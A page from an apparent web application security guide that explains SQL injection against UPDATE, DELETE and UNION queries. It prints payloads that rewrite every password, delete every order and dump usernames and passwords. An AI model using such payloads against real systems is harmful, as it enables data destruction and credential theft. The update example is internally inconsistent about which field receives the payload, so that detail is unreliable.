Web application security - the fast guide 1.1 | Page 124

Chapter 6 - Attack execution (2) P a g e | 124 UPDATE users SET password=’theNewPass’ WHERE user = ‘sami’ and password = ‘oldPassword’ Attack If the new password value is set to ( admin’ or 1=1-- ) the resulting query will become UPDATE users SET password=’theNewPass’ WHERE user = ‘admin’ or 1=1 6.9.4 Attacking Delete statement Using a method similar to the one used with update statement attacker can cause a great damage injecting into delete statement The following listing is dedicated to remove an order item from an order Listing DELETE FROM orders WHERE order_item_code=’p23453’ and order_Id=12 Attack: Setting order_item_code value to( ‘ or 1=1 )will cause the deletion of all orders in orders table. DELETE FROM orders WHERE order_item_code=’’ or 1=1 and order_Id=12 6.9.5 Attacking Using UNION Using union can open the door widely open to execute a separated select query. a simple query like the one shown in the following listing can be exploited to retrieve user names and passwords for all users. Listing Select * from titles where username=’sami’ Attack: Setting the username value to ( sami’ UNION SELECT uid,username,password FROM users-- ) Select * from titles where username=’sami’ UNION SELECT uid,username,password FROM users--